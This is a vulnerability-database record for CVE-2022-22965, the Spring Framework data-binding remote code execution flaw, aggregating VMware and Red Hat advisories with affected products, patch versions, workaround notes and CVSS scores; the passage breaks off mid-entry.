ID: CVE-2022-22965
Type: cve
Reporter: security@vmware.com
Modified: 2022-05-19T14:21:00
Description
A Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application to run on Tomcat as a WAR deployment. If the application is deployed as a Spring Boot executable jar, i.e. the default, it is not vulnerable to the exploit. However, the nature of the vulnerability is more general, and there may be other ways to exploit it.
{"vmware": [{"lastseen": "2022-04-14T16:19:16", "description": "**IMPORTANT See the Notes section if prior to April 6, 3 PM PST you have updated TAS or Ops Manager or you have applied workarounds to TAS, Ops Manager or TKGi.**\n\n##### **1\\. Impacted Products**\n\n * VMware Tanzu Application Service for VMs (TAS) \n\n * VMware Tanzu Operations Manager (Ops Manager) \n\n * VMware Tanzu Kubernetes Grid Integrated Edition (TKGI)\n\n##### **2\\. Introduction**\n\nA critical vulnerability in Spring Framework project identified by CVE-2022-22965 has been publicly disclosed which impacts VMware products. \n\n\n##### **3\\. Problem Description**\n\n**Description**\n\nMultiple products impacted by remote code execution vulnerability (CVE-2022-22965).\n\n**Known Attack Vectors**\n\nA malicious actor with network access to an impacted VMware product may exploit this issue to gain full control of the target system.\n\n**Resolution**\n\nFixes for CVE-2022-22965 are documented in the 'Fixed Version' column of the 'Response Matrix' below.\n\n**Workarounds**\n\nWorkarounds for CVE-2022-22965 are documented in the 'Workarounds' column of the 'Response Matrix' below.\n\n**Additional Documentation**\n\nNone.\n\n**Notes**\n\n * **2022-04-04:** At the time of this publication, VMware has reviewed its product portfolio and found that the products listed in this advisory are affected. VMware continues to investigate this vulnerability, and will update the advisory should any changes evolve.\n * **2022-04-06:** VMware is aware of reports that exploitation of CVE-2022-22965 has occurred in the wild. \n**2022-04-06:** Customers that have applied the workaround for TAS, Ops Manager, or TKGI prior to April 6, 3 PM PST will need to reapply the workaround. 
The new workaround instructions now use UAA 74.5.37 which properly addresses CVE-2022-22965.\n * **2022-04-06:** Customers that have updated to TAS 2.10.29, 2.11.17, 2.12.10 or 2.13.1 will need to update to the TAS versions listed in this advisory. The patched versions now listed in this advisory ship with UAA 74.5.37 which properly addresses CVE-2022-22965.\n * **2022-04-06:** Customers that have updated to Ops Manager 2.8.20, 2.9.35 or 2.10.35 are advised to deploy the workaround as no version for Ops Manager is yet available that addresses CVE-2022-22965.\n * **2022-04-07:** \nCustomers that have updated to Ops Manager 2.8.20, 2.9.35 or 2.10.35 will need to update to the Ops Manager versions listed in this advisory. The patched versions now listed in this advisory ship with UAA 74.5.37 which properly addresses CVE-2022-22965.\n * **2022-04-08:** Investigations have concluded, and the list of affected VMware products contained in the 'Response Matrix' below is complete.\n\n**Acknowledgements**\n\nNone.\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-02T00:00:00", "type": "vmware", "title": "VMware Response to Spring Framework Remote Code Execution Vulnerability (CVE-2022-22965)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": 
"2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-02T00:00:00", "id": "VMSA-2022-0010", "href": "https://www.vmware.com/security/advisories/VMSA-2022-0010.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-06T21:13:59", "description": "##### **1\\. Impacted Products**\n\n * VMware Tanzu Application Service for VMs \n\n * VMware Tanzu Operations Manager\n * VMware Tanzu Kubernetes Grid Integrated Edition (TKGI)\n\n##### **2\\. Introduction**\n\nA critical vulnerability in Spring Framework project identified by CVE-2022-22965 has been publicly disclosed which impacts VMware products. \n\n\n##### **3\\. Problem Description**\n\n**Description**\n\nMultiple products impacted by remote code execution vulnerability (CVE-2022-22965).\n\n**Known Attack Vectors**\n\nA malicious actor with network access to an impacted VMware product may exploit this issue to gain full control of the target system.\n\n**Resolution**\n\nFixes for CVE-2022-22965 are documented in the 'Fixed Version' column of the 'Response Matrix' below.\n\n**Workarounds**\n\nWorkarounds for CVE-2022-22965 are documented in the 'Workarounds' column of the 'Response Matrix' below.\n\n**Additional Documentation**\n\nNone.\n\n**Notes**\n\n * At the time of this publication, VMware has reviewed its product portfolio and found that the products listed in this advisory are affected. 
VMware continues to investigate this vulnerability, and will update the advisory should any changes evolve.\n * VMware is aware of reports that exploitation of CVE-2022-22965 has occurred in the wild.\n\n**Acknowledgements**\n\nNone.\n\n", "cvss3": {}, "published": "2022-04-02T00:00:00", "type": "vmware", "title": "VMware Response to Spring Framework Remote Code Execution Vulnerability (CVE-2022-22965)", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-06T00:00:00", "id": "VMSA-2022-0010.1", "href": "https://www.vmware.com/security/advisories/VMSA-2022-0010.1.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-05-04T02:32:49", "description": "**IMPORTANT See the Notes section if prior to April 6, 3 PM PST you have updated TAS or Ops Manager or you have applied workarounds to TAS, Ops Manager or TKGi.**\n\n##### **1\\. Impacted Products**\n\n * VMware Tanzu Application Service for VMs (TAS) \n\n * VMware Tanzu Operations Manager (Ops Manager) \n\n * VMware Tanzu Kubernetes Grid Integrated Edition (TKGI)\n\n##### **2\\. Introduction**\n\nA critical vulnerability in Spring Framework project identified by CVE-2022-22965 has been publicly disclosed which impacts VMware products. \n\n\n##### **3\\. 
Problem Description**\n\n**Description**\n\nMultiple products impacted by remote code execution vulnerability (CVE-2022-22965).\n\n**Known Attack Vectors**\n\nA malicious actor with network access to an impacted VMware product may exploit this issue to gain full control of the target system.\n\n**Resolution**\n\nFixes for CVE-2022-22965 are documented in the 'Fixed Version' column of the 'Response Matrix' below.\n\n**Workarounds**\n\nWorkarounds for CVE-2022-22965 are documented in the 'Workarounds' column of the 'Response Matrix' below.\n\n**Additional Documentation**\n\nNone.\n\n**Notes**\n\n * **2022-04-04:** At the time of this publication, VMware has reviewed its product portfolio and found that the products listed in this advisory are affected. VMware continues to investigate this vulnerability, and will update the advisory should any changes evolve.\n * **2022-04-06:** VMware is aware of reports that exploitation of CVE-2022-22965 has occurred in the wild. \n**2022-04-06:** Customers that have applied the workaround for TAS, Ops Manager, or TKGI prior to April 6, 3 PM PST will need to reapply the workaround. The new workaround instructions now use UAA 74.5.37 which properly addresses CVE-2022-22965.\n * **2022-04-06:** Customers that have updated to TAS 2.10.29, 2.11.17, 2.12.10 or 2.13.1 will need to update to the TAS versions listed in this advisory. The patched versions now listed in this advisory ship with UAA 74.5.37 which properly addresses CVE-2022-22965.\n * **2022-04-06:** Customers that have updated to Ops Manager 2.8.20, 2.9.35 or 2.10.35 are advised to deploy the workaround as no version for Ops Manager is yet available that addresses CVE-2022-22965.\n * **2022-04-07:** \nCustomers that have updated to Ops Manager 2.8.20, 2.9.35 or 2.10.35 will need to update to the Ops Manager versions listed in this advisory. 
The patched versions now listed in this advisory ship with UAA 74.5.37 which properly addresses CVE-2022-22965.\n * **2022-04-08:** Investigations have concluded, and the list of affected VMware products contained in the 'Response Matrix' below is complete.\n\n**Acknowledgements**\n\nNone.\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-02T00:00:00", "type": "vmware", "title": "VMware Response to Spring Framework Remote Code Execution Vulnerability (CVE-2022-22965)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-30T00:00:00", "id": "VMSA-2022-0010.5", "href": "https://www.vmware.com/security/advisories/VMSA-2022-0010.5.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-18T12:09:47", "description": "**IMPORTANT See the Notes section if prior to April 6, 3 PM PST you have updated TAS or Ops Manager or you have applied workarounds to TAS, Ops Manager or TKGi.**\n\n##### **1\\. 
Impacted Products**\n\n * VMware Tanzu Application Service for VMs (TAS) \n\n * VMware Tanzu Operations Manager (Ops Manager) \n\n * VMware Tanzu Kubernetes Grid Integrated Edition (TKGI)\n\n##### **2\\. Introduction**\n\nA critical vulnerability in Spring Framework project identified by CVE-2022-22965 has been publicly disclosed which impacts VMware products. \n\n\n##### **3\\. Problem Description**\n\n**Description**\n\nMultiple products impacted by remote code execution vulnerability (CVE-2022-22965).\n\n**Known Attack Vectors**\n\nA malicious actor with network access to an impacted VMware product may exploit this issue to gain full control of the target system.\n\n**Resolution**\n\nFixes for CVE-2022-22965 are documented in the 'Fixed Version' column of the 'Response Matrix' below.\n\n**Workarounds**\n\nWorkarounds for CVE-2022-22965 are documented in the 'Workarounds' column of the 'Response Matrix' below.\n\n**Additional Documentation**\n\nNone.\n\n**Notes**\n\n * **2022-04-04:** At the time of this publication, VMware has reviewed its product portfolio and found that the products listed in this advisory are affected. VMware continues to investigate this vulnerability, and will update the advisory should any changes evolve.\n * **2022-04-06:** VMware is aware of reports that exploitation of CVE-2022-22965 has occurred in the wild. \n**2022-04-06:** Customers that have applied the workaround for TAS, Ops Manager, or TKGI prior to April 6, 3 PM PST will need to reapply the workaround. The new workaround instructions now use UAA 74.5.37 which properly addresses CVE-2022-22965.\n * **2022-04-06:** Customers that have updated to TAS 2.10.29, 2.11.17, 2.12.10 or 2.13.1 will need to update to the TAS versions listed in this advisory. 
The patched versions now listed in this advisory ship with UAA 74.5.37 which properly addresses CVE-2022-22965.\n * **2022-04-06:** Customers that have updated to Ops Manager 2.8.20, 2.9.35 or 2.10.35 are advised to deploy the workaround as no version for Ops Manager is yet available that addresses CVE-2022-22965.\n * **2022-04-07:** \nCustomers that have updated to Ops Manager 2.8.20, 2.9.35 or 2.10.35 will need to update to the Ops Manager versions listed in this advisory. The patched versions now listed in this advisory ship with UAA 74.5.37 which properly addresses CVE-2022-22965.\n * **2022-04-08:** Investigations have concluded, and the list of affected VMware products contained in the 'Response Matrix' below is complete.\n\n**Acknowledgements**\n\nNone.\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-02T00:00:00", "type": "vmware", "title": "VMware Response to Spring Framework Remote Code Execution Vulnerability (CVE-2022-22965)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-08T00:00:00", "id": "VMSA-2022-0010.4", "href": 
"https://www.vmware.com/security/advisories/VMSA-2022-0010.4.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-04T08:32:24", "description": "**IMPORTANT See the Notes section if prior to April 6, 3 PM PST you have updated TAS or Ops Manager or you have applied workarounds to TAS, Ops Manager or TKGi.**\n\n##### **1\\. Impacted Products**\n\n * VMware Tanzu Application Service for VMs (TAS) \n\n * VMware Tanzu Operations Manager (Ops Manager) \n\n * VMware Tanzu Kubernetes Grid Integrated Edition (TKGI)\n\n##### **2\\. Introduction**\n\nA critical vulnerability in Spring Framework project identified by CVE-2022-22965 has been publicly disclosed which impacts VMware products. \n\n\n##### **3\\. Problem Description**\n\n**Description**\n\nMultiple products impacted by remote code execution vulnerability (CVE-2022-22965).\n\n**Known Attack Vectors**\n\nA malicious actor with network access to an impacted VMware product may exploit this issue to gain full control of the target system.\n\n**Resolution**\n\nFixes for CVE-2022-22965 are documented in the 'Fixed Version' column of the 'Response Matrix' below.\n\n**Workarounds**\n\nWorkarounds for CVE-2022-22965 are documented in the 'Workarounds' column of the 'Response Matrix' below.\n\n**Additional Documentation**\n\nNone.\n\n**Notes**\n\n * **2022-04-04:** At the time of this publication, VMware has reviewed its product portfolio and found that the products listed in this advisory are affected. VMware continues to investigate this vulnerability, and will update the advisory should any changes evolve.\n * **2022-04-06:** VMware is aware of reports that exploitation of CVE-2022-22965 has occurred in the wild. \n**2022-04-06:** Customers that have applied the workaround for TAS, Ops Manager, or TKGI prior to April 6, 3 PM PST will need to reapply the workaround. 
The new workaround instructions now use UAA 74.5.37 which properly addresses CVE-2022-22965.\n * **2022-04-06:** Customers that have updated to TAS 2.10.29, 2.11.17, 2.12.10 or 2.13.1 will need to update to the TAS versions listed in this advisory. The patched versions now listed in this advisory ship with UAA 74.5.37 which properly addresses CVE-2022-22965.\n * **2022-04-06:** Customers that have updated to Ops Manager 2.8.20, 2.9.35 or 2.10.35 are advised to deploy the workaround as no version for Ops Manager is yet available that addresses CVE-2022-22965.\n * **2022-04-07:** \nCustomers that have updated to Ops Manager 2.8.20, 2.9.35 or 2.10.35 will need to update to the Ops Manager versions listed in this advisory. The patched versions now listed in this advisory ship with UAA 74.5.37 which properly addresses CVE-2022-22965.\n * **2022-04-08:** Investigations have concluded, and the list of affected VMware products contained in the 'Response Matrix' below is complete.\n\n**Acknowledgements**\n\nNone.\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-02T00:00:00", "type": "vmware", "title": "VMware Response to Spring Framework Remote Code Execution Vulnerability (CVE-2022-22965)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": 
"2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-07T00:00:00", "id": "VMSA-2022-0010.3", "href": "https://www.vmware.com/security/advisories/VMSA-2022-0010.3.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "redhat": [{"lastseen": "2022-04-14T17:40:12", "description": "Red Hat Process Automation Manager is an open source business process management suite that combines process management and decision service management and enables business and IT users to create, manage, validate, and deploy process applications and decision services.\n\nThis asynchronous security patch is an update to Red Hat Process Automation Manager 7.\n\nSecurity Fix(es):\n\n* spring-webmvc: spring-framework: RCE via Data Binding on JDK 9+ (CVE-2022-22965)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-14T17:05:38", "type": "redhat", "title": "(RHSA-2022:1378) Low: Red Hat Process Automation Manager 7.12.1 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, 
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-14T17:06:00", "id": "RHSA-2022:1378", "href": "https://access.redhat.com/errata/RHSA-2022:1378", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-13T15:01:13", "description": "This release of Red Hat Fuse 7.10.2 serves as a replacement for Red Hat Fuse 7.10.1, and includes bug fixes and enhancements, which are documented in the Release Notes document linked to in the References.\n\nSecurity Fix(es):\n\n* spring-webmvc: spring-framework: RCE via Data Binding on JDK 9+ [fuse-7] (CVE-2022-22965)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-13T14:42:27", "type": "redhat", "title": "(RHSA-2022:1360) Low: Red Hat Fuse 7.10.2 release and security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 
6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-13T14:42:43", "id": "RHSA-2022:1360", "href": "https://access.redhat.com/errata/RHSA-2022:1360", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-14T17:42:22", "description": "Red Hat Decision Manager is an open source decision management platform that combines business rules management, complex event processing, Decision Model & Notation (DMN) execution, and business optimization for solving planning problems. It automates business decisions and makes that logic available to the entire business. \n\nThis asynchronous security patch is an update to Red Hat Decision Manager 7.\n\nSecurity Fix(es):\n\n* spring-webmvc: spring-framework: RCE via Data Binding on JDK 9+ (CVE-2022-22965)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-14T17:29:33", "type": "redhat", "title": "(RHSA-2022:1379) Low: Red Hat Decision Manager 7.12.1 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", 
"accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-14T17:29:56", "id": "RHSA-2022:1379", "href": "https://access.redhat.com/errata/RHSA-2022:1379", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-27T11:40:10", "description": "AMQ Broker is a high-performance messaging implementation based on ActiveMQ Artemis. It uses an asynchronous journal for fast message persistence, and supports multiple languages, protocols, and platforms. \n\nThis release of Red Hat AMQ Broker 7.9.4 serves as a replacement for Red Hat AMQ Broker 7.9.3, and includes security and bug fixes, and enhancements. For further information, refer to the release notes linked to in the References section.\n\nSecurity Fix(es):\n\n* spring-webmvc: spring-framework: RCE via Data Binding on JDK 9+ (CVE-2022-22965)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-27T09:45:16", "type": "redhat", "title": "(RHSA-2022:1627) Low: Red Hat AMQ Broker 7.9.4 release and security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", 
"integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-27T09:45:46", "id": "RHSA-2022:1627", "href": "https://access.redhat.com/errata/RHSA-2022:1627", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-12T19:28:33", "description": "A micro version update (from 1.6.4 to 1.6.5) is now available for Red Hat Camel K that includes CVE fixes in the base images, which are documented in the Release Notes document linked in the References section.\n\nSecurity Fix(es):\n\n* spring-beans: spring-framework: RCE via Data Binding on JDK 9+ (CVE-2022-22965)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-12T18:28:41", "type": "redhat", "title": "(RHSA-2022:1333) Low: Red Hat Integration Camel-K 1.6.5 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": 
"NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-12T18:29:00", "id": "RHSA-2022:1333", "href": "https://access.redhat.com/errata/RHSA-2022:1333", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-11T14:45:38", "description": "Red Hat Integration - Camel Extensions for Quarkus 2.2.1-1 serves as a replacement for 2.2.1 and includes the following security Fix(es):\n\nSecurity Fix(es):\n\n* spring-beans: spring-framework: RCE via Data Binding on JDK 9+ (CVE-2022-22965)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-11T14:02:32", "type": "redhat", "title": "(RHSA-2022:1306) Low: Red Hat Integration Camel Extensions for Quarkus 2.2.1-1 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-11T14:02:57", "id": 
"RHSA-2022:1306", "href": "https://access.redhat.com/errata/RHSA-2022:1306", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-27T11:42:55", "description": "AMQ Broker is a high-performance messaging implementation based on ActiveMQ Artemis. It uses an asynchronous journal for fast message persistence, and supports multiple languages, protocols, and platforms. \n\nThis release of Red Hat AMQ Broker 7.8.6 serves as a replacement for Red Hat AMQ Broker 7.8.5, and includes security and bug fixes, and enhancements. For further information, refer to the release notes linked to in the References section.\n\nSecurity Fix(es):\n\n* spring-webmvc: spring-framework: RCE via Data Binding on JDK 9+ (CVE-2022-22965)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-27T09:45:11", "type": "redhat", "title": "(RHSA-2022:1626) Low: Red Hat AMQ Broker 7.8.6 release and security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": 